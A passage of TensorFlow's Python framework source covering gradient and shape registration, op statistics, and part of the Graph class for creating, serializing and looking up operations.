  and returns `m` `Tensor` objects (representing the partial gradients
  with respect to each input of the op).

  For example, assuming that operations of type `"Sub"` take two
  inputs `x` and `y`, and return a single output `x - y`, the following
  gradient function would be registered:

  ```python
  @tf.RegisterGradient("Sub")
  def _sub_grad(unused_op, grad):
    return grad, tf.negative(grad)
  ```

  The decorator argument `op_type` is the string type of an
  operation. This corresponds to the `OpDef.name` field for the proto
  that defines the operation.
  """

  def __init__(self, op_type):
    """Creates a new decorator with `op_type` as the Operation type.

    Args:
      op_type: The string type of an operation. This corresponds to the
        `OpDef.name` field for the proto that defines the operation.
    """
    if not isinstance(op_type, six.string_types):
      raise TypeError("op_type must be a string")
    self._op_type = op_type

  def __call__(self, f):
    """Registers the function `f` as gradient function for `op_type`."""
    _gradient_registry.register(f, self._op_type)
    return f


def NotDifferentiable(op_type):
  """Specifies that ops of type `op_type` is not differentiable.

  This function should *not* be used for operations that have a
  well-defined gradient that is not yet implemented.

  This function is only used when defining a new op type. It may be
  used for ops such as `tf.size()` that are not differentiable.  For
  example:

  ```python
  tf.NotDifferentiable("Size")
  ```

  The gradient computed for 'op_type' will then propagate zeros.

  For ops that have a well-defined gradient but are not yet implemented,
  no declaration should be made, and an error *must* be thrown if
  an attempt to request its gradient is made.

  Args:
    op_type: The string type of an operation. This corresponds to the
      `OpDef.name` field for the proto that defines the operation.

  Raises:
    TypeError: If `op_type` is not a string.
  """
  if not isinstance(op_type, six.string_types):
    raise TypeError("op_type must be a string")
  # A registered value of None marks the op type as "no gradient".
  _gradient_registry.register(None, op_type)


# Alias for the old name, will be eventually removed.
NoGradient = NotDifferentiable


def get_gradient_function(op):
  """Returns the function that computes gradients for "op"."""
  if not op.inputs:
    return None
  try:
    # An op may override its gradient lookup type via the
    # "_gradient_op_type" attr (set by gradient_override_map).
    op_type = op.get_attr("_gradient_op_type")
  except ValueError:
    op_type = op.type
  return _gradient_registry.lookup(op_type)


_shape_registry = registry.Registry("shape functions")
_default_shape_function_registry = registry.Registry("default shape functions")

# These are set to common_shapes.call_cpp_shape_fn by op generated code
# (generated by python_op_gen.cc).
# It is set outside ops.py to avoid a circular dependency.
_call_cpp_shape_fn = None
_call_cpp_shape_fn_and_require_op = None


def _set_call_cpp_shape_fn(call_cpp_shape_fn):
  """Sets default shape fns from passed common_shapes.call_cpp_shape_fn."""
  global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op
  if _call_cpp_shape_fn:
    return  # already registered; subsequent calls are no-ops

  def call_without_requiring(op):
    return call_cpp_shape_fn(op, require_shape_fn=False)

  _call_cpp_shape_fn = call_without_requiring

  def call_with_requiring(op):
    return call_cpp_shape_fn(op, require_shape_fn=True)

  _call_cpp_shape_fn_and_require_op = call_with_requiring


class RegisterShape(object):
  """No longer used.

  Was: A decorator for registering a shape function.

  Shape functions must now be registered via the SetShapeFn on the
  original Op specification in C++.
  """

  def __init__(self, op_type):
    """Saves the `op_type` as the `Operation` type."""
    if not isinstance(op_type, six.string_types):
      raise TypeError("op_type must be a string")
    self._op_type = op_type

  def __call__(self, f):
    """Registers "f" as the shape function for "op_type"."""
    if f is None:
      assert _call_cpp_shape_fn

      # None is a special "weak" value that provides a default shape function,
      # and can be overridden by a non-None registration.
      try:
        _default_shape_function_registry.register(_call_cpp_shape_fn,
                                                  self._op_type)
      except KeyError:
        # Ignore duplicate registrations of the weak value. This can
        # occur if the op library input to wrapper generation
        # inadvertently links in one or more of the standard op
        # libraries.
        pass
    else:
      _shape_registry.register(f, self._op_type)
    return f


def set_shapes_for_outputs(op):
  """Uses the registered shape functions to set the shapes for op's outputs."""
  # Lookup order: explicit registration, then weak default, then the C++
  # shape function (which requires the op to define one).
  try:
    shape_func = _shape_registry.lookup(op.type)
  except LookupError:
    try:
      shape_func = _default_shape_function_registry.lookup(op.type)
    except LookupError:
      shape_func = _call_cpp_shape_fn_and_require_op

  shapes = shape_func(op)
  if shapes is None:
    raise RuntimeError(
        "Shape function for op %s did not return any shapes" % op)
  elif isinstance(shapes, dict):
    # Returned by call_cpp_shape_fn
    shapes_dict = shapes
    shapes = shapes_dict["shapes"]
    handle_datas = shapes_dict["handle_data"]
    for output, handle_data in zip(op.outputs, handle_datas):
      # pylint: disable=protected-access
      output._handle_data = handle_data
      # pylint: enable=protected-access

  if len(op.outputs) != len(shapes):
    raise RuntimeError(
        "Shape function for op %s returned %d shapes but expected %d %s %s" %
        (op, len(shapes), len(op.outputs), shape_func.__name__, str(shapes)))
  for output, s in zip(op.outputs, shapes):
    output.set_shape(s)


class OpStats(object):
  """A holder for statistics about an operator.

  This class holds information about the resource requirements for an op,
  including the size of its weight parameters on-disk and how many FLOPS it
  requires to execute forward inference.

  If you define a new operation, you can create a function that will return a
  set of information about its usage of the CPU and disk space when serialized.
  The function itself takes a Graph object that's been set up so you can call
  methods like get_tensor_by_name to help calculate the results, and a NodeDef
  argument.
  """

  def __init__(self, statistic_type, value=None):
    """Sets up the initial placeholders for the statistics."""
    self.statistic_type = statistic_type
    self.value = value

  @property
  def statistic_type(self):
    return self._statistic_type

  @statistic_type.setter
  def statistic_type(self, statistic_type):
    self._statistic_type = statistic_type

  @property
  def value(self):
    return self._value

  @value.setter
  def value(self, value):
    self._value = value

  def __iadd__(self, other):
    # Accumulate a statistic of the same type; None is treated as "no data".
    if other.statistic_type != self.statistic_type:
      raise ValueError("Can't add an OpStat of type %s to one of %s." %
                       (self.statistic_type, other.statistic_type))
    if self.value is None:
      self.value = other.value
    elif other.value is not None:
      self._value += other.value
    return self


_stats_registry = registry.Registry("statistical functions")


class RegisterStatistics(object):
  """A decorator for registering the statistics function for an op type.

  This decorator can be defined for an op type so that it gives a
  report on the resources used by an instance of an operator, in the
  form of an OpStats object.

  Well-known types of statistics include these so far:

  - flops: When running a graph, the bulk of the computation happens doing
    numerical calculations like matrix multiplications. This type allows a node
    to return how many floating-point operations it takes to complete. The
    total number of FLOPs for a graph is a good guide to its expected latency.

  You can add your own statistics just by picking a new type string, registering
  functions for the ops you care about, and then calling get_stats_for_node_def.

  If a statistic for an op is registered multiple times, a KeyError will be
  raised.

  Since the statistics is counted on a per-op basis. It is not suitable for
  model parameters (capacity), which is expected to be counted only once, even
  if it is shared by multiple ops. (e.g. RNN)

  For example, you can define a new metric called doohickey for a Foo operation
  by placing this in your code:

  ```python
  @ops.RegisterStatistics("Foo", "doohickey")
  def _calc_foo_bojangles(unused_graph, unused_node_def):
    return ops.OpStats("doohickey", 20)
  ```

  Then in client code you can retrieve the value by making this call:

  ```python
  doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey")
  ```

  If the NodeDef is for an op with a registered doohickey function, you'll get
  back the calculated amount in doohickey.value, or None if it's not defined.
  """

  def __init__(self, op_type, statistic_type):
    """Saves the `op_type` as the `Operation` type."""
    # Registry keys are "op_type,statistic_type", hence neither component may
    # contain a comma.
    if not isinstance(op_type, six.string_types):
      raise TypeError("op_type must be a string.")
    if "," in op_type:
      raise TypeError("op_type must not contain a comma.")
    self._op_type = op_type
    if not isinstance(statistic_type, six.string_types):
      raise TypeError("statistic_type must be a string.")
    if "," in statistic_type:
      raise TypeError("statistic_type must not contain a comma.")
    self._statistic_type = statistic_type

  def __call__(self, f):
    """Registers "f" as the statistics function for "op_type"."""
    _stats_registry.register(f, self._op_type + "," + self._statistic_type)
    return f


def get_stats_for_node_def(graph, node, statistic_type):
  """Looks up the node's statistics function in the registry and calls it.

  This function takes a Graph object and a NodeDef from a GraphDef, and if
  there's an associated statistics method, calls it and returns a result. If no
  function has been registered for the particular node type, it returns an
  empty statistics object.

  Args:
    graph: A Graph object that's been set up with the node's graph.
    node: A NodeDef describing the operator.
    statistic_type: A string identifying the statistic we're interested in.

  Returns:
    An OpStats object containing information about resource usage.
  """
  try:
    stats_func = _stats_registry.lookup(node.op + "," + statistic_type)
    result = stats_func(graph, node)
  except LookupError:
    # No function registered for this op/statistic: return an empty stat
    # (value=None) rather than raising.
    result = OpStats(statistic_type)
  return result


def _name_from_scope_name(name):
  """Returns the name of an op given the name of its scope.

  Args:
    name: the name of the scope.

  Returns:
    the name of the op (equal to scope name minus any trailing slash).
  """
  return name[:-1] if (name and name[-1] == "/") else name


class Graph(object):
  """A TensorFlow computation, represented as a dataflow graph.

  A `Graph` contains a set of
  @{tf.Operation} objects,
  which represent units of computation; and
  @{tf.Tensor} objects, which represent
  the units of data that flow between operations.

  A default `Graph` is always registered, and accessible by calling
  @{tf.get_default_graph}.
  To add an operation to the default graph, simply call one of the functions
  that defines a new `Operation`:

  ```python
  c = tf.constant(4.0)
  assert c.graph is tf.get_default_graph()
  ```

  Another typical usage involves the
  @{tf.Graph.as_default}
  context manager, which overrides the current default graph for the
  lifetime of the context:

  ```python
  g = tf.Graph()
  with g.as_default():
    # Define operations and tensors in `g`.
    c = tf.constant(30.0)
    assert c.graph is g
  ```

  Important note: This class *is not* thread-safe for graph construction. All
  operations should be created from a single thread, or external
  synchronization must be provided. Unless otherwise specified, all methods
  are not thread-safe.

  A `Graph` instance supports an arbitrary number of "collections"
  that are identified by name.
  For convenience when building a large graph, collections can store groups of
  related objects: for example, the `tf.Variable` uses a collection (named
  @{tf.GraphKeys.GLOBAL_VARIABLES}) for
  all variables that are created during the construction of a graph. The caller
  may define additional collections by specifying a new name.
  """

  def __init__(self):
    """Creates a new, empty Graph."""
    # Protects the core state that may be accessed by multiple readers.
    # Only state that can be returned via public accessors (`as_graph_def()`,
    # `get_operations()`, `as_graph_element()`, `get_collection()`, and
    # `get_collection_ref()`) is guarded by the lock. Thread-safety is provided
    # on a best-effort basis to support buggy programs, and is not guaranteed
    # by the public `tf.Graph` API.
    # NOTE(mrry): This does not protect the various stacks. A warning will
    # be reported if these are used from multiple threads
    self._lock = threading.Lock()
    self._nodes_by_id = dict()  # GUARDED_BY(self._lock)
    self._next_id_counter = 0  # GUARDED_BY(self._lock)
    self._nodes_by_name = dict()  # GUARDED_BY(self._lock)
    self._version = 0  # GUARDED_BY(self._lock)
    # Current name stack: uniquified names
    self._name_stack = ""
    # Maps a name used in the graph to the next id to use for that name.
    self._names_in_use = {}
    # Functions that will be applied to choose a device if none is specified.
    self._device_function_stack = []
    # Default original_op applied to new ops.
    self._default_original_op = None
    # Current control flow context. It could be either CondContext or
    # WhileContext defined in ops/control_flow_ops.py
    self._control_flow_context = None
    # A new node will depend on the union of all of the nodes in the stack.
    self._control_dependencies_stack = []
    # Arbitrary collections of objects.
    self._collections = {}
    # The graph-level random seed
    self._seed = None
    # A dictionary of attributes that should be applied to all ops.
    self._attr_scope_map = {}
    # A map from op type to the kernel label that should be used.
    self._op_to_kernel_label_map = {}
    # A map from op type to an alternative op type that should be used when
    # computing gradients.
    self._gradient_override_map = {}
    # True if the graph is considered "finalized".  In that case no
    # new operations can be added.
    self._finalized = False
    # Functions defined in the graph
    self._functions = collections.OrderedDict()
    # Default GraphDef versions
    self._graph_def_versions = versions_pb2.VersionDef(
        producer=versions.GRAPH_DEF_VERSION,
        min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER)
    self._building_function = False
    # Stack of colocate_with ops
    self._colocation_stack = []
    # Set of tensors that are dangerous to feed!
    self._unfeedable_tensors = set()
    # Set of operations that are dangerous to fetch!
    self._unfetchable_ops = set()
    # A map of tensor handle placeholder to tensor dtype.
    self._handle_feeders = {}
    # A map from tensor handle to its read op.
    self._handle_readers = {}
    # A map from tensor handle to its move op.
    self._handle_movers = {}
    # A map from tensor handle to its delete op.
    self._handle_deleters = {}
    # Resource container.
    if context.in_graph_mode():
      self._container_prefix = ""
    else:
      # In Eager mode, isolate resources (particularly ResourceVariables) in
      # Graphs by default. This prevents unintended variable sharing. Graph mode
      # gets this kind of isolation from Sessions.
      self._container_prefix = "eager-execution-%d/" % (uid(),)
    self._container = self._container_prefix
    self._registered_ops = op_def_registry.get_registered_ops()

    # TODO(skyewm): fold as much of the above as possible into the C
    # implementation
    if _USE_C_API:
      self._scoped_c_graph = c_api_util.ScopedTFGraph()
    else:
      self._scoped_c_graph = None

  def _convert_stack(self, stack, include_func_start_lineno=False):
    """Converts a stack extracted using _extract_stack() to a traceback stack.

    Args:
      stack: A list of n 6-tuples,
        (filename, lineno, name, frame_globals, func_start_lineno,
        unused_frame_info), as produced by _extract_stack().
      include_func_start_lineno: True if function start line number should be
        included as the 5th entry in return tuples.

    Returns:
      A list of n 4-tuples or 5-tuples
      (filename, lineno, name, code, [optional: func_start_lineno]), where the
      code tuple element is calculated from the corresponding elements of the
      input tuple.
    """
    ret = []
    for (filename, lineno, name, frame_globals, func_start_lineno,
         unused_frame_info) in stack:
      linecache.checkcache(filename)
      # The third argument is module_globals, used by linecache to locate
      # sources loaded via PEP 302 loaders (e.g. zipimport).
      line = linecache.getline(filename, lineno, frame_globals)
      if line:
        line = line.strip()
      else:
        line = None
      if include_func_start_lineno:
        ret.append((filename, lineno, name, line, func_start_lineno))
      else:
        ret.append((filename, lineno, name, line))
    return ret

  def _extract_stack(self):
    """A lightweight, extensible re-implementation of traceback.extract_stack.

    NOTE(mrry): traceback.extract_stack eagerly retrieves the line of code for
      each stack frame using linecache, which results in an abundance of stat()
      calls. This implementation does not retrieve the code, and any consumer
      should apply _convert_stack to the result to obtain a traceback that can
      be formatted etc. using traceback methods.

    Derived classes can implement _extract_frame_info() to add extra information
    to the traceback.

    Returns:
      A list of 6-tuples
      (filename, lineno, name, frame_globals, func_start_lineno, custom_info)
      corresponding to the call stack of the current thread.
    """
    # Raising and catching an exception is a portable way to obtain the
    # current frame without depending on sys._getframe().
    try:
      raise ZeroDivisionError
    except ZeroDivisionError:
      f = sys.exc_info()[2].tb_frame.f_back
    ret = []
    while f is not None:
      lineno = f.f_lineno
      co = f.f_code
      filename = co.co_filename
      name = co.co_name
      frame_globals = f.f_globals
      func_start_lineno = co.co_firstlineno
      frame_info = self._extract_frame_info(f)
      ret.append((filename, lineno, name, frame_globals, func_start_lineno,
                  frame_info))
      f = f.f_back
    ret.reverse()
    return ret

  def _extract_frame_info(self, frame):  # pylint: disable=unused-argument
    """Extracts custom information from a frame in an op traceback."""
    return None

  def _check_not_finalized(self):
    """Check if the graph is finalized.

    Raises:
      RuntimeError: If the graph is finalized.
    """
    if self._finalized:
      raise RuntimeError("Graph is finalized and cannot be modified.")

  def _add_op(self, op):
    """Adds 'op' to the graph.

    Args:
      op: the Operator or Tensor to add.

    Raises:
      TypeError: if op is not an Operation or Tensor.
      ValueError: if the op.name or op._id are already used.
    """
    self._check_not_finalized()
    if not isinstance(op, (Tensor, Operation)):
      raise TypeError("op must be a Tensor or Operation: %s" % op)
    with self._lock:
      # pylint: disable=protected-access
      if op._id in self._nodes_by_id:
        raise ValueError("cannot add an op with id %d as it already "
                         "exists in the graph" % op._id)
      if op.name in self._nodes_by_name:
        raise ValueError("cannot add op with name %s as that name "
                         "is already used" % op.name)
      self._nodes_by_id[op._id] = op
      self._nodes_by_name[op.name] = op
      self._version = max(self._version, op._id)
      # pylint: enable=protected-access

  @property
  def _c_graph(self):
    if self._scoped_c_graph:
      return self._scoped_c_graph.graph
    return None

  @property
  def version(self):
    """Returns a version number that increases as ops are added to the graph.

    Note that this is unrelated to the
    @{tf.Graph.graph_def_versions}.

    Returns:
      An integer version that increases as ops are added to the graph.
    """
    if self._finalized:
      # Finalized graphs are immutable, so the lock is unnecessary.
      return self._version

    with self._lock:
      return self._version

  @property
  def graph_def_versions(self):
    # pylint: disable=line-too-long
    """The GraphDef version information of this graph.

    For details on the meaning of each version, see
    [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto).

    Returns:
      A `VersionDef`.
    """
    # pylint: enable=line-too-long
    if self._c_graph:
      with errors.raise_exception_on_not_ok_status() as status:
        with c_api_util.tf_buffer() as buf:
          c_api.TF_GraphVersions(self._c_graph, buf, status)
          data = c_api.TF_GetBuffer(buf)
      version_def = versions_pb2.VersionDef()
      version_def.ParseFromString(compat.as_bytes(data))
      return version_def
    else:
      return self._graph_def_versions

  @property
  def seed(self):
    """The graph-level random seed of this graph."""
    return self._seed

  @seed.setter
  def seed(self, seed):
    self._seed = seed

  @property
  def finalized(self):
    """True if this graph has been finalized."""
    return self._finalized

  def finalize(self):
    """Finalizes this graph, making it read-only.

    After calling `g.finalize()`, no new operations can be added to
    `g`.  This method is used to ensure that no operations are added
    to a graph when it is shared between multiple threads, for example
    when using a @{tf.train.QueueRunner}.
    """
    self._finalized = True

  def _unsafe_unfinalize(self):
    """Opposite of `finalize`. Internal interface.

    NOTE: Unfinalizing a graph could have negative impact on performance,
    especially in a multi-threaded environment.  Unfinalizing a graph
    when it is in use by a Session may lead to undefined behavior. Ensure
    that all sessions using a graph are closed before calling this method.
    """
    self._finalized = False

  def _get_control_flow_context(self):
    """Returns the current control flow context.

    Returns:
      A context object.
    """
    return self._control_flow_context

  def _set_control_flow_context(self, ctx):
    """Sets the current control flow context.

    Args:
      ctx: a context object.
    """
    self._control_flow_context = ctx

  def _as_graph_def(self, from_version=None, add_shapes=False):
    # pylint: disable=line-too-long
    """Returns a serialized `GraphDef` representation of this graph.

    The serialized `GraphDef` can be imported into another `Graph`
    (using @{tf.import_graph_def}) or used with the
    [C++ Session API](../../../../api_docs/cc/index.md).

    This method is thread-safe.

    Args:
      from_version: Optional.  If this is set, returns a `GraphDef`
        containing only the nodes that were added to this graph since
        its `version` property had the given value.
      add_shapes: If true, adds an "_output_shapes" list attr to each
        node with the inferred shapes of each of its outputs.

    Returns:
      A tuple containing a
      [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
      protocol buffer, and the version of the graph to which that
      `GraphDef` corresponds.

    Raises:
      ValueError: If the `graph_def` would be too large.

    """
    # pylint: enable=line-too-long
    with self._lock:
      graph = graph_pb2.GraphDef()
      graph.versions.CopyFrom(self._graph_def_versions)
      bytesize = 0
      # Iterating in id order keeps the serialized node order deterministic.
      for op_id in sorted(self._nodes_by_id):
        op = self._nodes_by_id[op_id]
        if from_version is None or op_id > from_version:
          graph.node.extend([op.node_def])
          if op.outputs and add_shapes:
            assert "_output_shapes" not in graph.node[-1].attr
            graph.node[-1].attr["_output_shapes"].list.shape.extend(
                [output.get_shape().as_proto() for output in op.outputs])
          bytesize += op.node_def.ByteSize()
          # The 2GB cap tracks the protobuf serialization limit; the < 0 test
          # guards against overflow on platforms with bounded ints.
          if bytesize >= (1 << 31) or bytesize < 0:
            raise ValueError("GraphDef cannot be larger than 2GB.")
      if self._functions:
        for f in self._functions.values():
          bytesize += f.definition.ByteSize()
          if bytesize >= (1 << 31) or bytesize < 0:
            raise ValueError("GraphDef cannot be larger than 2GB.")
          graph.library.function.extend([f.definition])
          if f.grad_func_name:
            grad_def = function_pb2.GradientDef()
            grad_def.function_name = f.name
            grad_def.gradient_func = f.grad_func_name
            graph.library.gradient.extend([grad_def])
    return graph, self._version
  def as_graph_def(self, from_version=None, add_shapes=False):
    # pylint: disable=line-too-long
    """Returns a serialized `GraphDef` representation of this graph.

    The serialized `GraphDef` can be imported into another `Graph`
    (using @{tf.import_graph_def}) or used with the
    [C++ Session API](../../api_docs/cc/index.md).

    This method is thread-safe.

    Args:
      from_version: Optional.  If this is set, returns a `GraphDef`
        containing only the nodes that were added to this graph since
        its `version` property had the given value.
      add_shapes: If true, adds an "_output_shapes" list attr to each
        node with the inferred shapes of each of its outputs.

    Returns:
      A
      [`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
      protocol buffer.

    Raises:
      ValueError: If the `graph_def` would be too large.
    """
    # pylint: enable=line-too-long
    # Public variant of _as_graph_def: discard the version component of the
    # returned tuple.
    result, _ = self._as_graph_def(from_version, add_shapes)
    return result

  def _is_function(self, name):
    """Tests whether 'name' is registered in this graph's function library.

    Args:
      name: string op name.

    Returns:
      bool indicating whether or not 'name' is registered in function library.
    """
    return name in self._functions

  def _get_function(self, name):
    """Returns the function definition for 'name'.

    Args:
      name: string function name.

    Returns:
      The function def proto, or None if no function with that name is
      registered.
    """
    return self._functions.get(name, None)

  def _add_function(self, function):
    """Adds a function to the graph.

    After the function has been added, you can call to the function by
    passing the function name in place of an op name to
    `Graph.create_op()`.

    Args:
      function: A `_DefinedFunction` object.

    Raises:
      ValueError: if another function is defined with the same name.
    """
    name = function.name
    # Sanity checks on gradient definition.
    # A function may define its gradient either as a named gradient function
    # or as a Python gradient function, but not both.
    if (function.grad_func_name is not None) and (function.python_grad_func is
                                                  not None):
      raise ValueError("Gradient defined twice for function %s" % name)

    # Add function to graph
    # pylint: disable=protected-access
    if self._c_graph:
      assert function._c_func, (
          "Cannot add function created without C API support to graph "
          "created with C API support")
      with errors.raise_exception_on_not_ok_status() as status:
        gradient = function._grad_func._c_func if function._grad_func else None
        c_api.TF_GraphCopyFunction(self._c_graph, function._c_func, gradient,
                                   status)
    else:
      # If there is already a function with the same name, raise an error
      # if bodies are different. Else, do nothing. The C API version above
      # has the same behavior.
      previous = self._functions.get(name, None)
      if previous:
        # This check is not ideal as we can have a hash collision with only
        # 32 bits in the hash, but the non C API mode is being deprecated.
        # Don't bother changing it now.
        if previous._hash_str == function._hash_str:
          return
        else:
          raise ValueError("Another function is already defined with that name")
    # pylint: enable=protected-access

    self._functions[name] = function

    # Need a new-enough consumer to support the functions we add to the graph.
    if self._graph_def_versions.min_consumer < 12:
      self._graph_def_versions.min_consumer = 12

  @property
  def building_function(self):
    """Returns True iff this graph represents a function."""
    return self._building_function

  # Helper functions to create operations.
  def create_op(
      self,
      op_type,
      inputs,
      dtypes,  # pylint: disable=redefined-outer-name
      input_types=None,
      name=None,
      attrs=None,
      op_def=None,
      compute_shapes=True,
      compute_device=True):
    """Creates an `Operation` in this graph.

    This is a low-level interface for creating an `Operation`. Most
    programs will not call this method directly, and instead use the
    Python op constructors, such as `tf.constant()`, which add ops to
    the default graph.

    Args:
      op_type: The `Operation` type to create. This corresponds to the
        `OpDef.name` field for the proto that defines the operation.
      inputs: A list of `Tensor` objects that will be inputs to the
        `Operation`.
      dtypes: A list of `DType` objects that will be the types of the
        tensors that the operation produces.
      input_types: (Optional.) A list of `DType`s that will be the types of
        the tensors that the operation consumes. By default, uses the base
        `DType` of each input in `inputs`. Operations that expect
        reference-typed inputs must specify `input_types` explicitly.
      name: (Optional.) A string name for the operation. If not specified, a
        name is generated based on `op_type`.
      attrs: (Optional.) A dictionary where the key is the attribute name (a
        string) and the value is the respective `attr` attribute of the
        `NodeDef` proto that will represent the operation (an `AttrValue`
        proto).
      op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
        the operation will have.
      compute_shapes: (Optional.) If True, shape inference will be performed
        to compute the shapes of the outputs.
      compute_device: (Optional.) If True, device functions will be executed
        to compute the device property of the Operation.

    Raises:
      TypeError: if any of the inputs is not a `Tensor`.
      ValueError: if colocation conflicts with existing device assignment.

    Returns:
      An `Operation` object.
    """
    self._check_not_finalized()
    for idx, a in enumerate(inputs):
      if not isinstance(a, Tensor):
        raise TypeError("Input #%d is not a tensor: %s" % (idx, a))
    if name is None:
      name = op_type
    # If a names ends with a '/' it is a "name scope" and we use it as-is,
    # after removing the trailing '/'.
    if name and name[-1] == "/":
      name = _name_from_scope_name(name)
    else:
      name = self.unique_name(name)

    node_def = _NodeDef(op_type, name, device=None, attrs=attrs)

    # Apply any additional attributes requested. Do not overwrite any existing
    # attributes.
    for key, value in self._attr_scope_map.items():
      if key not in node_def.attr:
        # A scope-map value may be a callable that computes the attr lazily
        # from the node_def; None means "leave the attr unset".
        if callable(value):
          value = value(node_def)
          if not isinstance(value, (type(None), attr_value_pb2.AttrValue)):
            raise TypeError(
                "Callable for scope map key '%s' must return either None or "
                "an AttrValue protocol buffer; but it returned: %s" %
                (key, value))
        node_def.attr[key].CopyFrom(value)

    # Apply a kernel label if one has been specified for this op_type.
    try:
      kernel_label = self._op_to_kernel_label_map[op_type]
      node_def.attr["_kernel"].CopyFrom(
          attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label)))
    except KeyError:
      pass

    # Apply the overriding op_type for gradients if one has been
    # specified for this op_type.
    try:
      mapped_op_type = self._gradient_override_map[op_type]
      node_def.attr["_gradient_op_type"].CopyFrom(
          attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type)))
    except KeyError:
      pass

    control_inputs = self._control_dependencies_for_inputs(inputs)
    ret = Operation(
        node_def,
        self,
        inputs=inputs,
        output_types=dtypes,
        control_inputs=control_inputs,
        input_types=input_types,
        original_op=self._default_original_op,
        op_def=op_def)
    if compute_shapes:
      set_shapes_for_outputs(ret)
    self._add_op(ret)
    self._record_op_seen_by_control_dependencies(ret)

    if compute_device:
      self._apply_device_functions(ret)

    if self._colocation_stack:
      all_colocation_groups = []
      for colocation_op in self._colocation_stack:
        all_colocation_groups.extend(colocation_op.colocation_groups())
        if colocation_op.device:
          # Make this device match the device of the colocated op, to
          # provide consistency between the device and the colocation
          # property.
          if (ret.device and pydev.canonical_name(ret.device) !=
              pydev.canonical_name(colocation_op.device)):
            # Conflicting devices: keep the op's own device and only warn.
            logging.warning("Tried to colocate %s with an op %s that had "
                            "a different device: %s vs %s. "
                            "Ignoring colocation property.",
                            name, colocation_op.name, ret.device,
                            colocation_op.device)
          else:
            ret._set_device(colocation_op.device)  # pylint: disable=protected-access

      all_colocation_groups = sorted(set(all_colocation_groups))
      ret.node_def.attr["_class"].CopyFrom(
          attr_value_pb2.AttrValue(list=attr_value_pb2.AttrValue.ListValue(
              s=all_colocation_groups)))

    # Sets "container" attribute if
    # (1) self._container is not None
    # (2) "is_stateful" is set in OpDef
    # (3) "container" attribute is in OpDef
    # (4) "container" attribute is None
    if (self._container and op_type in self._registered_ops and
        self._registered_ops[op_type].is_stateful and
        "container" in ret.node_def.attr and
        not ret.node_def.attr["container"].s):
      ret.node_def.attr["container"].CopyFrom(
          attr_value_pb2.AttrValue(s=compat.as_bytes(self._container)))

    return ret

  def as_graph_element(self, obj, allow_tensor=True, allow_operation=True):
    """Returns the object referred to by `obj`, as an `Operation` or `Tensor`.

    This function validates that `obj` represents an element of this
    graph, and gives an informative error message if it is not.

    This function is the canonical way to get/validate an object of
    one of the allowed types from an external argument reference in the
    Session API.

    This method may be called concurrently from multiple threads.

    Args:
      obj: A `Tensor`, an `Operation`, or the name of a tensor or operation.
        Can also be any object with an `_as_graph_element()` method that
        returns a value of one of these types.
      allow_tensor: If true, `obj` may refer to a `Tensor`.
      allow_operation: If true, `obj` may refer to an `Operation`.

    Returns:
      The `Tensor` or `Operation` in the Graph corresponding to `obj`.

    Raises:
      TypeError: If `obj` is not a type we support attempting to convert
        to types.
      ValueError: If `obj` is of an appropriate type but invalid. For
        example, an invalid string.
      KeyError: If `obj` is not an object in the graph.
    """
    # Once the graph is finalized the node tables can no longer change, so
    # the lock can be skipped for read access.
    if self._finalized:
      return self._as_graph_element_locked(obj, allow_tensor, allow_operation)

    with self._lock:
      return self._as_graph_element_locked(obj, allow_tensor, allow_operation)

  def _as_graph_element_locked(self, obj, allow_tensor, allow_operation):
    """See `Graph.as_graph_element()` for details."""
    # The vast majority of this function is figuring
    # out what an API user might be doing wrong, so
    # that we can give helpful error messages.
    #
    # Ideally, it would be nice to split it up, but we
    # need context to generate nice error messages.

    if allow_tensor and allow_operation:
      types_str = "Tensor or Operation"
    elif allow_tensor:
      types_str = "Tensor"
    elif allow_operation:
      types_str = "Operation"
    else:
      raise ValueError("allow_tensor and allow_operation can't both be False.")

    temp_obj = _as_graph_element(obj)
    if temp_obj is not None:
      obj = temp_obj

    # If obj appears to be a name...
    if isinstance(obj, compat.bytes_or_text_types):
      name = compat.as_str(obj)

      if ":" in name and allow_tensor:
        # Looks like a Tensor name and can be a Tensor.
        try:
          op_name, out_n = name.split(":")
          out_n = int(out_n)
        # NOTE(review): bare except; the intended failure modes are the
        # ValueError from a bad split/int, but this also swallows anything
        # else raised here.
        except:
          raise ValueError("The name %s looks a like a Tensor name, but is "
                           "not a valid one. Tensor names must be of the "
                           "form \"<op_name>:<output_index>\"." % repr(name))
        if op_name in self._nodes_by_name:
          op = self._nodes_by_name[op_name]
        else:
          raise KeyError("The name %s refers to a Tensor which does not "
                         "exist. The operation, %s, does not exist in the "
                         "graph." % (repr(name), repr(op_name)))
        try:
          return op.outputs[out_n]
        # NOTE(review): bare except; the expected case is IndexError from an
        # out-of-range output index.
        except:
          raise KeyError("The name %s refers to a Tensor which does not "
                         "exist. The operation, %s, exists but only has "
                         "%s outputs." % (repr(name), repr(op_name),
                                          len(op.outputs)))

      elif ":" in name and not allow_tensor:
        # Looks like a Tensor name but can't be a Tensor.
        raise ValueError("Name %s appears to refer to a Tensor, not a %s." %
                         (repr(name), types_str))

      elif ":" not in name and allow_operation:
        # Looks like an Operation name and can be an Operation.
        if name not in self._nodes_by_name:
          raise KeyError("The name %s refers to an Operation not in the "
                         "graph." % repr(name))
        return self._nodes_by_name[name]

      elif ":" not in name and not allow_operation:
        # Looks like an Operation name but can't be an Operation.
        if name in self._nodes_by_name:
          # Yep, it's an Operation name
          err_msg = ("The name %s refers to an Operation, not a %s." %
                     (repr(name), types_str))
        else:
          err_msg = ("The name %s looks like an (invalid) Operation name, "
                     "not a %s." % (repr(name), types_str))
        err_msg += (" Tensor names must be of the form "
                    "\"<op_name>:<output_index>\".")
        raise ValueError(err_msg)

    elif isinstance(obj, Tensor) and allow_tensor:
      # Actually obj is just the object it's referring to.
      if obj.graph is not self:
        raise ValueError("Tensor %s is not an element of this graph." % obj)
      return obj
    elif isinstance(obj, Operation) and allow_operation:
      # Actually obj is just the object it's referring to.
      if obj.graph is not self:
        raise ValueError("Operation %s is not an element of this graph." % obj)
      return obj
    else:
      # We give up!
      raise TypeError("Can not convert a %s into a %s." %
                      (type(obj).__name__, types_str))

